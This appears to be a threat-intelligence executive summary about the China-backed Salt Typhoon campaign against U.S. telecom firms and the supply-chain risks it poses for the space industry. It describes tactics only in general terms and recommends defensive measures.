A hand holding a smartphone with a glowing red warning triangle and exclamation mark above it, symbolizing a digital alert or security warning.

Executive Summary

Over the past three months, U.S. Government officials have escalated warnings about cyberattacks targeting U.S. telecommunications firms and other U.S. critical infrastructure. These concerns are centered around the ongoing activities of Salt Typhoon (also known as Earth Estries), a China-backed advanced persistent threat (APT) group. Salt Typhoon is attributed to what some Congressional members have called the most significant telecommunications hack in U.S. history, affecting major telecom companies and resulting in the theft of sensitive correspondence data, including metadata and call details.

In addition to these breaches, U.S. officials report that Chinese hackers maintain persistent access to telecom systems supporting multiple critical infrastructure sectors. This access underscores the long-term espionage objectives of Chinese nation-state actors, with implications that extend beyond telecommunications to industries like space, defense, and aerospace.

To date, Salt Typhoon has managed to compromise nine major U.S. telecom companies, breaching their systems and exfiltrating vast amounts of sensitive data. Analysts have revealed that the stolen data includes metadata on where, when, and with whom individuals were communicating, offering adversaries a strategic advantage in intelligence gathering. The breaches have prompted urgent warnings from U.S. officials, who assert that nation state actors have maintained persistent access to telecom systems, enabling continuous surveillance and exploitation.

The pervasive nature of these campaigns stems from the ability of adversaries to exploit technical and operational weaknesses as an entry point into networks. Salt Typhoon actors achieve initial access by exploiting unpatched network devices and through “living-off-the-land” techniques to achieve and sustain long term access to critical systems. These tactics have become critical components of espionage campaigns targeting critical infrastructure sectors. Salt Typhoon’s operations also leverage sophisticated phishing tactics and social engineering ploys to entice users into providing access credentials to networks and devices. Once inside the target network, Salt Typhoon employs command and scripting interpreters to carry out additional malicious activities. The group extensively utilizes built-in tools commonly available in Windows environments, such as PowerShell and WMIC, to employ stealth, evade detection, and maintain persistent access in a compromised network. Similar campaigns, such as Volt Typhoon (2023), have demonstrated a consistent pattern of stealthy, persistent intrusions aimed at U.S. critical infrastructure, underscoring the growing concern towards long-term campaigns designed for persistent access to victim networks.

The scope of the Salt Typhoon campaign continues to expand, as the list of impacted companies grows to include large communication firms and internet service providers. Despite the focus on telecommunications, the potential for cross-sector impacts remains paramount due to concerns of shared infrastructure and supply chain risks. Findings from a similar campaign reported by Trend Micro show that attacks targeting telecommunications companies exploited cloud servers and databases in addition to vendor networks. Investment in 5G and direct-to-device capabilities strengthens the linkage between telecommunication firms and the commercial space industry. This increasing overlap introduces new potential risks for the space industry by opening the door to additional supply chain vulnerabilities in terrestrial infrastructure as a significant attack vector.

Space firms use routers, network devices, and management platforms like those exploited in the Salt Typhoon attacks. Exploitation of unpatched vulnerabilities in these devices could extend to satellite ground stations, command-and-control systems, and other mission-critical infrastructure. Additionally, the interconnected nature of supply chains between the telecom and space sectors means that compromised vendors in one industry can have cascading effects on the other.

Overall, the Salt Typhoon campaign is a stark reminder of the evolving threat landscape and the need for vigilance across all critical infrastructure sectors. For the space industry, the lessons from telecom breaches are clear: Shared vulnerabilities demand shared solutions. Global communications providers should also follow sector-specific guidance, including visibility and hardening practices for communications infrastructure, a joint advisory published by DHS CISA and international partners on December 04, 2024. By adopting proactive security measures and collaborating with industry peers, space firms can strengthen their defenses against sophisticated, state-sponsored cyber adversaries.